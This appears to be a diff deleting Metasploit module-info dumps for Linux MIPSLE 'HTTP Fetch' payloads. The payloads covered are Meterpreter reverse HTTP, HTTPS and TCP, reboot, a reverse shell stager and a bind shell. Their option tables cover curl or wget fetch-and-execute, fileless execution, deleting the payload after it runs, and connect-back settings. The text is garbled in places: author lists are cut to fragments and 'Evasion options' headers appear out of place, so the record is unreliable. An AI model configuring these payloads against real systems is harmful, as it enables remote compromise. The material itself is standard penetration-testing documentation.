FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,104 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_http
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
ok@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME gfkVVWTotp no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_https
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 111
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
B
|
||||
Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME oKPKrTwiNTi no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,97 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 111
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME cUPPonWYqDQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,68 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Reboot
|
||||
Module: payload/cmd/linux/http/mipsle/reboot
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Michael Messner <devnull@s3cur1ty.de>
|
||||
rigan - <imrigan@gmail.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME HqyjVOMSY no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
|
||||
A very small shellcode for rebooting the system.
|
||||
This payload is sometimes helpful for testing purposes.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,91 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/mipsle/shell/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 102
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
tkmru
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME fHMIGJaY no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,74 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
|
||||
Module: payload/cmd/linux/http/mipsle/shell_bind_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
scut
|
||||
vaicebine
|
||||
Vlatko Kosturjak
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME buADmLwtKq no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSLE payload from an HTTP server.
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
